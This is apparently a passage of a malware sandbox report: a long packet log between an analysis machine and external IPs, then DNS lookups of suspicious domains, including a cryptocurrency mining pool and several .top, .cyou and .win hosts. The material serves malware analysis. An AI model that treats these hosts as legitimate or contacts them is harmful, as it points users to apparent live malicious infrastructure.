                                                                                                                                                                                              Dec 16, 2024 01:01:46.000750065 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.000766039 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.000794888 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.000828981 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.001895905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.001944065 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.002043962 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.002448082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003125906 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003145933 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003186941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003225088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003236055 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003298044 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003298998 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003364086 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003426075 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.003432035 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.004198074 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.004244089 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.004327059 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.005477905 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.005525112 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.005577087 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.006619930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.006665945 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.006772995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.006817102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.007842064 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.008187056 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.008239985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.009011030 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.009155989 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.009165049 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.010337114 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.010353088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.010379076 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.010411978 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.011365891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.011548042 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.011591911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.012562037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.012636900 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.012681961 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.013778925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.013897896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.013943911 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.014952898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.014998913 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.015327930 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.016114950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.016160011 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.016211987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.017210007 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.017266989 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.017494917 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.017541885 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.018562078 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.018594027 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.018646002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.019722939 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.019767046 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.019812107 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.020899057 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.020951033 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.021213055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.022345066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.022361040 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.022397995 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.022398949 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.023339987 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.023356915 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.023401976 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.023402929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.024389029 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.024435043 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.024481058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.024534941 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.025649071 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.025713921 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.025762081 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.026770115 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.026985884 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.027033091 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.028060913 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.028291941 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.028352976 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.029145956 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.029191017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.029370070 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.030505896 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.030522108 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.030564070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.030564070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.031564951 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.031739950 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.031790018 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.032819986 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.032835960 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.032882929 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.151472092 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.151495934 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.151577950 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.152570963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.152596951 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.152625084 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.152657032 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.272260904 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.272289038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.272449017 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.273575068 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.273601055 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.273648977 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392246008 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392271996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392303944 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392321110 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392328024 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392338037 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392355919 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392363071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392363071 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392394066 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392394066 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392430067 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392446995 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392462969 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392479897 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392489910 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392498016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392512083 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392518044 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392555952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392555952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.392555952 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393318892 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393343925 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393362045 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393378973 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393388987 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393398046 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393413067 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393435955 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.393436909 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394062996 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394082069 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394098997 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394115925 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394117117 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394115925 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394138098 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394139051 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394155979 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394156933 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394175053 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.394192934 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.396770000 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.396797895 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.396962881 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.396964073 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.397032022 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.397243977 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.398803949 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.398823023 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.398988008 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.398988008 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.399019957 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.400526047 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.400549889 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.400585890 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.400620937 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.400644064 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.401678085 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.403127909 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.403146982 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.403182983 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.403196096 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.403211117 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.404861927 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.404885054 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.404912949 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.404922009 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.404937983 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.404963017 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.406590939 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.406609058 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.406641006 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.406650066 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.406666040 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.406692982 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.407449007 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.408195972 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.408211946 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.408240080 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.408246994 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.408271074 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.408291101 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.409106970 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.409125090 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.409152985 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.409167051 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.409173965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.409207106 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.410064936 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.410083055 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.410124063 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.410142899 CET44349859154.216.20.243192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.410166025 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.411763906 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.411781073 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.411797047 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.411832094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.411832094 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.411870003 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.411946058 CET49859443192.168.2.4154.216.20.243
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412584066 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412601948 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412617922 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412635088 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412645102 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412652016 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412666082 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412671089 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412687063 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412692070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412692070 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412719965 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.412738085 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413455963 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413472891 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413491011 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413507938 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413526058 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413526058 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413551092 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.413573980 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414329052 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414345980 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414361954 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414378881 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414386988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414386988 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414397001 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414407969 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414416075 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414433002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414433002 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.414452076 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415194035 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415216923 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415235043 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415251970 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415268898 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415273905 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415333986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415333986 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.415992022 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416008949 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416054964 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416068077 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416074038 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416093111 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416110992 CET804984831.41.244.11192.168.2.4
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416119099 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416146040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416146040 CET4984880192.168.2.431.41.244.11
                                                                                                                                                                                              Dec 16, 2024 01:01:46.416932106 CET804984831.41.244.11192.168.2.4

                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                              Dec 16, 2024 01:01:12.246836901 CET192.168.2.41.1.1.10x7a86Standard query (0)woo097878781.winA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:01:31.559663057 CET192.168.2.41.1.1.10x32e4Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:01:40.524260998 CET192.168.2.41.1.1.10xe1f4Standard query (0)drive-connect.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:05.518965006 CET192.168.2.41.1.1.10x5939Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:05.519047022 CET192.168.2.41.1.1.10x4461Standard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:13.815776110 CET192.168.2.41.1.1.10x584bStandard query (0)home.fivegr5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:13.815871954 CET192.168.2.41.1.1.10x89bbStandard query (0)home.fivegr5sb.top28IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:17.438262939 CET192.168.2.41.1.1.10x5c08Standard query (0)home.fivegr5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:17.438596010 CET192.168.2.41.1.1.10x4f53Standard query (0)home.fivegr5sb.top28IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:44.057934046 CET192.168.2.41.1.1.10x30e8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:02:44.058092117 CET192.168.2.41.1.1.10x5bd2Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:27.126842022 CET192.168.2.41.1.1.10x408eStandard query (0)fivegr5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:27.126842976 CET192.168.2.41.1.1.10x3da5Standard query (0)fivegr5sb.top28IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:30.726519108 CET192.168.2.41.1.1.10x6b49Standard query (0)fivegr5sb.topA (IP address)IN (0x0001)false
                                                                                                                                                                                              Dec 16, 2024 01:04:30.726736069 CET192.168.2.41.1.1.10xa766Standard query (0)fivegr5sb.top28IN (0x0001)false
